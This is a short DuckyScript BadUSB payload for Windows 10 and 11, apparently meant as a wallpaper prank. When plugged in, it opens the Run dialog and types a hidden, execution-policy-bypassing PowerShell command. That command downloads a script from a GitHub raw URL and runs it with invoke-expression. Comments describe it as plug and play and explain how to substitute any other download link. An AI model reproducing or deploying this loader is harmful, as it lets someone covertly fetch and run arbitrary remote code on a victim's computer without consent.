REM     Title: Wallpaper-BadUsb
REM     Target: Windows 10, 11

REM     Remeber to replace the link with your link for the intended file to download if you are using a custom variant of this payload
REM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly

REM     --------------------------------------------------------------------------------------
REM     THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
REM     --------------------------------------------------------------------------------------

GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://raw.githubusercontent.com/Bob337/wallpaper_badusb/main/Wallpaper-Troll.ps1?dl=1; invoke-expression $pl
DELAY 500
ENTER
